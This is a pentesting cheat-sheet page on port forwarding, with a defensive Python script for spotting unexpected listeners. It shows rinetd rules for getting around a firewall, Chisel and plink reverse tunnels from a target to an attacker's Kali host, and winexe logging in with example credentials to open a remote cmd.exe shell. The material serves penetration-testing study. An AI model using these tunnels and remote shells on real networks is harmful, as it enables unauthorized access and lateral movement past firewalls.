Hack$Notes
Port Forwarding

Simple port forwarding tricks

Main concept: accept traffic on a given IP and port, then redirect it to another IP and port.

Scenario

A Windows box needs to connect to an external device over RDP, but firewall restrictions block the connection.

We can set up a proxy on a Linux box to bypass this:

vi /etc/rinetd.conf
# Add a rule in the form: bindaddress  bindport  connectaddress  connectport
# bindaddress = local/public IP on Kali, connectaddress = external IP we want to connect to
208.88.127.99   80   EXTERNAL_IP   3389
/etc/init.d/rinetd restart
# Connect from Windows to the external IP over RDP by pointing the client at 208.88.127.99:80

Investigate sockets running on the target

ss -tulpn

-t:	Display TCP sockets
-u:	Display UDP sockets
-l:	Display only listening sockets
-p:	Show the process using the socket
-n:	Don't resolve service names (ports are shown as numbers)
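
The same socket listing can be checked against a baseline to spot forwarders like the ones on this page. The Python below is an added example, not part of the original notes: it parses `ss -tulpn` output and reports network-reachable listeners whose owning process is not on an allowlist. The sample output is constructed, and the allowlist (only `sshd`) is a hypothetical baseline.

```python
import ipaddress
import re

# Constructed sample of `ss -tulpn` output (not captured from a real host).
SAMPLE = """\
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp   UNCONN 0      0      127.0.0.53%lo:53   0.0.0.0:*         users:(("systemd-resolve",pid=612,fd=13))
tcp   LISTEN 0      128    0.0.0.0:22         0.0.0.0:*         users:(("sshd",pid=801,fd=3))
tcp   LISTEN 0      5      208.88.127.99:80   0.0.0.0:*         users:(("rinetd",pid=1420,fd=4))
tcp   LISTEN 0      4096   *:9002             *:*               users:(("chisel_linux",pid=1533,fd=6))
tcp   LISTEN 0      128    [::1]:631          [::]:*
"""

PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+)')

def parse_ss(text):
    """Turn `ss -tulpn` output into dicts: proto, addr, port, process, pid."""
    sockets = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0] == "Netid":
            continue  # header or malformed line
        addr, _, port = fields[4].rpartition(":")
        addr = addr.split("%")[0].strip("[]")  # drop %iface and IPv6 brackets
        # The Process column is empty when ss runs without root privileges.
        m = PROC_RE.search(" ".join(fields[6:]))
        sockets.append({
            "proto": fields[0], "addr": addr, "port": int(port),
            "process": m.group(1) if m else None,
            "pid": int(m.group(2)) if m else None,
        })
    return sockets

def is_loopback(addr):
    """'*' means every interface, so it is never loopback-only."""
    return addr != "*" and ipaddress.ip_address(addr).is_loopback

def unexpected_listeners(text, allowed):
    """Sockets reachable from the network whose owner is not on the allowlist."""
    return [s for s in parse_ss(text)
            if not is_loopback(s["addr"]) and s["process"] not in allowed]

if __name__ == "__main__":
    # Hypothetical baseline: only sshd is expected to listen on this host.
    for s in unexpected_listeners(SAMPLE, allowed={"sshd"}):
        print(f'{s["proto"]} {s["addr"]}:{s["port"]} {s["process"]} pid={s["pid"]}')
```

A listener with no process information (ss run without root) is reported as unexpected when it is bound to a non-loopback address, so it gets reviewed rather than silently skipped.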

Chisel

### On Windows Target ###
chisel_windows.exe client KALI_IP_BOX:9002 R:14147:localhost:14147

### On Kali ###
./chisel_linux server --reverse --port 9002

plink

On Target:
.\plink.exe root@KALI_IP -R 445:127.0.0.1:445

On Kali:
winexe -U 'admin%password123' //127.0.0.1 cmd.exe

Last updated 3 years ago

Download Chisel from here